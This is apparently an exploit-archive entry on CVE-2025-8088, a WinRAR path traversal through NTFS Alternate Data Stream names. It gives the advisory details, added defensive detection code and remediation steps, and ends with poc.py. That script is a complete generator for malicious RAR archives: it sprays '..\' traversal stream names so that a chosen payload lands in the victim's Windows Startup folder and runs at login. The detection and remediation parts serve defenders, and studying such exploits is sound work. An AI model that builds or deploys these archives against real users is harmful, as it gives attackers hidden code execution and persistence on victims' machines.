PoC Archive

WinRAR Windows Path Traversal via NTFS Alternate Data Streams (CVE-2025-8088)

by ESET (discovery/analysis); pexlexity (PoC) · 2026-07-01

CVSS 8.4/10
Severity
High
CVE
CVE-2025-8088
Category
misc
Affected product
WinRAR (Windows)
Affected versions
Prior to WinRAR 7.13
Disclosed
August 2025 (ESET); fix released in WinRAR 7.13, July 2025
Patch status
patched

Metadata

Field                 Value
Date Added            2026-07-01
Last Updated          2025-07
Author / Researcher   ESET (discovery/analysis); pexlexity (PoC)
CVE / Advisory        CVE-2025-8088
Category              misc
Severity              High
CVSS Score            8.4 (CVSSv3)
Status                Weaponized
Tags                  path-traversal, WinRAR, NTFS, Alternate-Data-Streams, RomCom, Storm-0978, persistence, startup-folder, in-the-wild
Related               CVE-2025-6218

Affected Target

Field                     Value
Software / System         WinRAR (Windows)
Versions Affected         Prior to WinRAR 7.13
Language / Platform       Python (PoC generator)
Authentication Required   No (victim must open/extract the crafted archive)
Network Access Required   No (local file processing; delivered via phishing/decoy document)

Summary

CVE-2025-8088 is a path traversal vulnerability in the Windows version of WinRAR. A specially crafted RAR archive carries NTFS Alternate Data Stream (ADS) entries whose stream names contain ..\ traversal sequences; when a vulnerable WinRAR build extracts the archive, the stream name is appended to the path of the extracted file it belongs to, and the ..\ components are resolved by Windows before the file is created, so the data is written outside the intended extraction directory. In-the-wild exploitation reported by ESET (attributed to RomCom, also tracked as Storm-0978) used a decoy document visible to the victim while hidden ADS-backed entries dropped attacker-controlled files into sensitive locations such as the Windows Startup folder, giving LNK, HTA, VBScript, or PowerShell loaders execution at the next login. This is a distinct vulnerability from CVE-2025-6218, the earlier WinRAR path-traversal bug already in this archive. Fixed in WinRAR 7.13 (July 2025).


Vulnerability Details

Root Cause

WinRAR's Windows extraction code builds the destination of an archived NTFS Alternate Data Stream by appending the stream name, taken verbatim from the archive, to the path of the file it belongs to, without rejecting path separators or ..\ components in that name. Windows path normalization then collapses the ..\ components before the file is created, so the stream data lands as a regular file at an attacker-chosen location outside the extraction directory. Only Windows builds are affected; Unix builds of RAR/UnRAR do not process NTFS streams.

Attack Vector

  1. Attacker crafts a RAR archive containing a decoy document (visible to the victim) plus one or more ADS entries attached to it whose stream names begin with ..\ sequences. Because the depth of the victim's extraction folder is unknown, the entries are typically sprayed with different numbers of ..\ so that one of them lands at the intended location.
  2. Victim opens or extracts the archive with a vulnerable WinRAR build.
  3. WinRAR writes the hidden payload to the attacker-chosen path outside the extraction directory (e.g., the Startup folder); entries whose depth does not match land elsewhere or fail to write.
  4. The payload executes automatically at the next user login, giving persistence and code execution.

Impact

Arbitrary file write on the victim’s Windows filesystem, commonly leveraged for persistence and eventual code execution via auto-run locations.


Environment / Lab Setup

Target:   Windows host with WinRAR < 7.13 installed
Attacker: Python 3

Proof of Concept

PoC Script

See poc.py in this folder.

python poc.py --decoy resume.txt --payload evil.bat --out exploit.rar

Crafts a .rar archive combining a visible decoy document with ADS entries whose stream names carry ..\ traversal (one entry per depth, up to --max_up). Extracted by a vulnerable WinRAR build, the entry whose depth matches drops the payload into the Windows Startup folder for persistence. The generator has to run on Windows (NTFS is needed to create the streams) and shells out to rar.exe, which must be on PATH and told to store NTFS streams; confirm with "dir /r resume.txt" that the streams exist on the decoy before trusting the resulting archive.


Detection & Indicators of Compromise

Signs of compromise:

  • New LNK/HTA/VBS/PS1 files in the Startup folder shortly after opening an email attachment/archive
  • Phishing emails with RAR attachments containing a plausible decoy document
  • Endpoint telemetry showing WinRAR.exe writing files outside the user-selected extraction path
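The three indicators above as added detection logic (not from the PoC repository or from ESET), run over constructed file-create events. The event fields process, extract_root and path are an assumed schema; map your EDR or Sysmon FileCreate fields onto them.

```python
import ntpath
import re

# Added example, not code from the PoC repository or from ESET's analysis.
# The event schema (process, extract_root, path) and the SAMPLE_EVENTS are
# constructed for illustration.

ARCHIVER_PROCESSES = {"winrar.exe", "rar.exe", "unrar.exe"}
# After normalization this matches both the per-user and the all-users Startup folder.
STARTUP_MARKER = r"\microsoft\windows\start menu\programs\startup" + "\\"
STREAM_TRAVERSAL = re.compile(r":\.\.[\\/]")  # "<file>:..\" is the crafted ADS name itself


def _norm(path):
    return ntpath.normcase(ntpath.normpath(path))


def is_under(root, path):
    """True if path, after normalization, lies inside root."""
    root, path = _norm(root), _norm(path)
    try:
        return ntpath.commonpath([root, path]) == root
    except ValueError:  # different drives, or absolute mixed with relative
        return False


def is_startup_location(path):
    return STARTUP_MARKER in _norm(path)


def has_stream_traversal(path):
    """Raw path still carries '<file>:..\\' (telemetry that logs the un-normalized name)."""
    return STREAM_TRAVERSAL.search(path) is not None


def triage(events):
    """One finding per archiver write that matches an indicator, with the reasons."""
    findings = []
    for ev in events:
        if ev["process"].lower() not in ARCHIVER_PROCESSES:
            continue  # shortcuts created by the user or an installer are not this bug
        reasons = []
        if has_stream_traversal(ev["path"]):
            reasons.append("ADS name contains '..\\' traversal")
        if not is_under(ev["extract_root"], ev["path"]):
            reasons.append("write outside user-selected extraction folder")
        if is_startup_location(ev["path"]):
            reasons.append("write into Startup folder")
        if reasons:
            findings.append({"process": ev["process"], "path": ev["path"], "reasons": reasons})
    return findings


# Constructed sample telemetry, not real captures.
SAMPLE_EVENTS = [
    {"process": "WinRAR.exe", "extract_root": r"C:\Users\victim\Downloads\resume",
     "path": r"C:\Users\victim\Downloads\resume\resume.txt"},                      # benign
    {"process": "WinRAR.exe", "extract_root": r"C:\Users\victim\Downloads\resume",
     "path": r"C:\Users\victim\Downloads\resume\resume.txt:Zone.Identifier"},      # benign ADS
    {"process": "WinRAR.exe", "extract_root": r"C:\Users\victim\Downloads\resume",
     "path": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk"},
    {"process": "WinRAR.exe", "extract_root": r"C:\Users\victim\Downloads\resume",
     "path": r"C:\Users\victim\Downloads\resume\resume.txt:..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk"},
    {"process": "explorer.exe", "extract_root": "",
     "path": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyApp.lnk"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["path"], "->", "; ".join(finding["reasons"]))
```

The benign Zone.Identifier stream passes because a colon inside the last component still resolves under the extraction root; the "outside the extraction folder" rule is the one that holds regardless of which auto-run location a campaign picks, so keep it even if you only alert on the Startup folder today.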

Remediation

Action           Detail
Primary fix      Upgrade to WinRAR 7.13 or later
Mitigation       Restrict/monitor write access to auto-run locations (Startup folder, Run keys)
User awareness   Treat unsolicited RAR attachments, even with plausible decoy content, as suspicious

References

https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC (PoC repository)

Notes

Auto-ingested from https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC on 2026-07-01. This CVE has an unusually large number of independent public PoC repositories (25+), indicating the bug is trivial to reproduce; pexlexity was selected as a clean, minimal, verified reference implementation. Not to be confused with CVE-2025-6218 (a different WinRAR path-traversal bug already tracked in this archive).

poc.py
import argparse
import os
import subprocess
import sys


def create_ads(decoy_file, stream_name, payload_data):
    """Write payload_data into an NTFS Alternate Data Stream named stream_name on decoy_file.

    The stream name carries the '..\\' traversal. On extraction by a vulnerable
    WinRAR the stream is written as <dest>\\<decoy>:<stream_name>, which Windows
    resolves to a location outside the extraction folder.

    Caveat: the same Win32 path normalization applies when this script opens the
    <decoy>:<stream_name> path, so check with "dir /r <decoy>" that the streams
    really exist on the decoy (and that no stray files appeared elsewhere) before
    building the archive.
    """
    ads_path = f"{decoy_file}:{stream_name}"
    with open(ads_path, 'wb') as f:
        f.write(payload_data)


def main():
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2025-8088: build a malicious RAR with path traversal via ADS.")
    parser.add_argument('--decoy', required=True,
                        help="Path to the decoy file (created if it does not exist).")
    parser.add_argument('--payload', required=True,
                        help="Path to the payload file (BAT or EXE).")
    parser.add_argument('--out', default="malicious.rar",
                        help="Name of the output RAR archive.")
    parser.add_argument('--max_up', type=int, default=20,
                        help="Maximum number of traversal levels (..) to spray.")
    parser.add_argument('--target_path',
                        default=r"AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\malware.bat",
                        help="Target path for the payload, relative to the directory the traversal climbs to.")
    args = parser.parse_args()

    # Alternate Data Streams exist only on NTFS, so the generator must run on Windows.
    if os.name != "nt":
        sys.exit("This generator must run on Windows (NTFS is required for Alternate Data Streams).")

    # Check the input files
    if not os.path.exists(args.payload):
        sys.exit(f"Payload file not found: {args.payload}")

    with open(args.payload, 'rb') as f:
        payload_data = f.read()

    # Create the decoy if it does not exist
    if not os.path.exists(args.decoy):
        with open(args.decoy, 'w') as f:
            f.write("This is a decoy file.\n")

    # Spray one ADS per traversal depth: the depth of the victim's extraction
    # folder is unknown, so one of the levels should land in the Startup folder
    # while the others land elsewhere or fail to write.
    for level in range(1, args.max_up + 1):
        traversal = '..\\' * level
        stream_name = f"{traversal}{args.target_path}"
        create_ads(args.decoy, stream_name, payload_data)
        print(f"Added ADS: {stream_name}")

    # Build the archive with rar.exe. -os makes rar.exe store NTFS streams;
    # without it the ADS entries are not written into the archive.
    try:
        subprocess.check_call(["rar", "a", "-m5", "-os", args.out, args.decoy])
        print(f"Created malicious archive: {args.out}")
    except FileNotFoundError:
        sys.exit("rar.exe not found in PATH. Install WinRAR and add its folder to PATH.")
    except subprocess.CalledProcessError as e:
        sys.exit(f"Archive creation failed: {e}")


if __name__ == "__main__":
    main()